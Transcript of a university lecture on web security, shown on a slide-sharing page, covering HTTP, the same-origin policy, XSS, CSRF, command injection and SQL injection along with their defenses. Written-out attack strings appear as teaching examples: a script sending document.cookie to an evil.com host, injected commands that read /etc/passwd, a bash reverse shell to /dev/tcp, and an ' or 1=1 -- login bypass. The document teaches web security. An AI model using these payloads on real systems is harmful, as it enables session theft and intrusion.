Web Security Fundamentals

lecture 25 web security n.w
1 / 30
Embed
Share

This content covers various aspects of web security, including networking stack layers, the application layer with a focus on HTTP, example requests and responses, HTTP response codes, vulnerabilities over the years, vulnerability occurrences in applications, and issues like broken authentication. It provides an insightful overview of web security concepts and challenges.

  • Web Security
  • Networking Stack
  • HTTP Protocol
  • Vulnerabilities
  • Authentication
rayaanacharya
domanickb Follow

Uploaded on | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

Download Presentation

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

E N D

Presentation Transcript

  1. Lecture 25: Web Security CS 181S Spring 2024

  2. Networking Stack 7 - Application Deliver content HTTP 6 - Presentation Manage encoding 5 - Session Manage sessions TLS/SSL 4 - Transport Deliver (un)reliably TCP/UDP 3 - Network Deliver globally IP 2 - Data Link Deliver locally Ethernet 1 - Physical Deliver signals 0s and 1s

  3. Application Layer: HTTP Hypertext Transfer Protocol (HTTP) is an application protocol for distributed information systems Stateless request-response protocol Requests resources identified by Uniform Resource Locators (URLs) Request GET HEAD POST Response Retrieve resource (no side effects) Retrieve header for GET request (no body) Requests that server accept new object (e.g., results of form or new database item) and store it as subordinate of resource identified by URI Requests that server store new object under supplied URI Delete specified resource PUT DELETE

  4. Example Request Request Method Path Protocol Version HTTP Request: Headers HTTP Response: Header Body

  5. HTTP Response Codes Code 200 201 302 401 403 404 409 500 502 Message OK Created Found Unauthorized Forbidden Not Found Conflict Internal Server Error Bad Gateway

  6. Vulnerabilities by Year 3500 DDOS 3000 Overflow XSS 2500 CSRF SQL 2000 1500 1000 500 0

  7. Vulnerability Occurrence in Applications Misconfigurations (O6) XSS (O7) Broken Authentication (O2) Broken Access Control (O5) CSRF Injection (O1) 0% 10% 20% 30% 40% 50% 60% 70% 80% 90%

  8. Broken Authentication

  9. HTML <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>CS 181S - Fall 2018</title> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300i,600,700,700i' rel='stylesheet' type='text/css'> <link href='https://fonts.googleapis.com/css?family=Inconsolata:400,700,700i' rel='stylesheet' type='text/css'> <link href="resources/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="resources/css/main.css"> </head> <body> <header class="site-header"> <div class="navbar navbar-inverse navbar-fixed-top"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="/courses/cs5430/2018sp/">CS 181S <span class="hidden-xs hidden-sm">: System Security</span> <span class="hidden-md hidden-lg"> - Fall 2018</span> </a> </div>

  10. Dynamic Web Pages Server-Side Client-Side PHP Ruby Python Java Go Javascript

  11. Same Origin Policy (SOP) Data for http://www.example.com/dir/page.html accessed by: http://www.example.com/dir/page2.html http://www.example.com/dir2/page3.html https://www.example.com/dir/page.html http://www.example.com:81/dir/page.html http://www.example.com:80/dir/page.html http://evil.com/dir/page.html http://example.com/dir/page.html

  12. SOP Exceptions Domain relaxation: document.domain Cross-origin network requests: Access-Control-Allow-Origin Cross-origin client-side communication: postMessage Importing scripts

  13. Cross-Site Scripting (XSS) Form of code injection evil.com sends victim a script that runs on example.com

  14. Reflected XSS Attack Server 1 2 5 Victim Server

  15. Reflected XSS Search field on victim.com: http://victim.com/search.php?term=apple Server-side implementation of search.php: <html> <title> Search Results </title> <body> Results for <?php echo $_GET[term] ?>: ...</body> </html> What if victim instead clicks on: http://victim.com/search.php?term= <script> window.open( http://evil.com?cookie = + document.cookie ) </script>

  16. Reflected XSS Attack Server www.evil.com http://victim.com/search.php? term= <script> ... </script> Victim Server www.victim.com <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script> </html>

  17. Stored XSS Attack Server 1 Inject malicious script User Victim Server Victim

  18. Stored XSS attack vectors loaded images HTML attributes user content (comments, blog posts)

  19. Example XSS attacks

  20. XSS Defenses Parameter Validation HTTP-Only Cookies Dynamic Data Tainting Static Analysis Script Sandboxing

  21. Cookies Cookies are small blocks of data stored locally by the web browser Cookie is sent with every request to that domain Can be used to keep track of whether a user has authenticated (as which user) And also other things Can be set by third parties

  22. Cross-Site Request Forgery (CSRF) Server Victim 1 4 2 User Victim Attack Server

  23. CSRF Defenses Secret Validation Token: <input type=hidden value=23a3af01b> Referrer Validation: Referrer: http://www.facebook.com/home.php Custom HTTP Header: X-Requested-By: XMLHttpRequest User Interaction (e.g., CAPTCHA)

  24. Command Injection Key issue: exporting local execution capability via Web interface Request:http://vulnsite/ping?host=8.8.8.8 Executes: ping c 2 8.8.8.8 Simple command injection Request: http://vulnsite/ping?host=8.8.8.8;cat /etc/passwd Executes: ping c 2 8.8.8.8;cat /etc/passwd Outputs ping output and the contents of /etc/passwd Getting sneakier ping c 2 8.8.8.8|cat /etc/passwd ping c 2 8.8.8.8&cat$IFS$9/etc/passwd ping c 2 $(cat /etc/passwd) ping c 2 <(bash -i >& /dev/tcp/10.0.0.1/443 0>&1)

  25. SQL Injection SQL Injection is another example of code injection Adversary exploits user-controlled input to change meaning of database command

  26. SQL Injection Enter Username & Password SELECT * FROM Users WHERE user='me' AND pwd='1234' Web Browser (Client) Web Server DB

  27. SQL Injection Enter Username & Password SELECT * FROM Users WHERE user='me' AND pwd='1234' Web Browser (Client) Web Server DB What if user = ' or 1=1 --

  28. SQLi in the Wild

  29. Defenses Against SQL Injection Prepared Statements: String custname = request.getParameter("customerName"); // perform input validation to detect attacks String query = "SELECT account_balance FROM user_data WHERE user_name = ? "; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, custname); ResultSet results = pstmt.executeQuery( ); Input Validation: Case statements, cast to non-string type Escape User-supplied inputs: Not recommended

  30. SQL Injection

Related


Introduction to Web and HTTP Protocols in Data Communication Networks

Introduction to Web and HTTP Protocols in Data Communication Networks

luan
The Evolution of Web Development_ Trends Shaping the Future

The Evolution of Web Development_ Trends Shaping the Future

Adarsh
Web Design & Development company in mohali Amrit web Web Design & Development co

Web Design & Development company in mohali Amrit web Web Design & Development co

Amrit
Web Portal Development Cost

Web Portal Development Cost

Shru
The Fundamentals of Web Front-End Development

The Fundamentals of Web Front-End Development

goodwine_n
Internet Basics and Web Browsers

Internet Basics and Web Browsers

riur595
Websites and Web Pages

Websites and Web Pages

tabi_407
Web Characteristics for Building a Search Engine

Web Characteristics for Building a Search Engine

berlanga_l
Web Hosting and Server Types

Web Hosting and Server Types

trac_189
Web Technologies and Internet Standards

Web Technologies and Internet Standards

iprot
Web Accessibility and Its Importance

Web Accessibility and Its Importance

kate_555
Fundamentals of Web Engineering

Fundamentals of Web Engineering

smcli
Semantic Web Technologies and Knowledge Representation Overview

Semantic Web Technologies and Knowledge Representation Overview

aris_eel
Graph Structure in the Web: A Comprehensive Analysis

Graph Structure in the Web: A Comprehensive Analysis

ameli
Web Browsers and Internet Explorer

Web Browsers and Internet Explorer

tyre_nks
Network Coordinate-based Web Service Positioning Framework for Response Time Prediction

Network Coordinate-based Web Service Positioning Framework for Response Time Prediction

bra_rus
Evolution of the Web: A Journey Through Time

Evolution of the Web: A Journey Through Time

coraleigh
Silverlight for Web Hosting Companies

Silverlight for Web Hosting Companies

decla
How Websites Work with HTML

How Websites Work with HTML

mrua
Web Security Essentials

Web Security Essentials

zdev
Resources for SharePoint Designers: Enhancing Web Content

Resources for SharePoint Designers: Enhancing Web Content

aar_the
Overview of Web Libraries, Tools, and Frameworks for Building Web Apps

Overview of Web Libraries, Tools, and Frameworks for Building Web Apps

lboon

More Related Content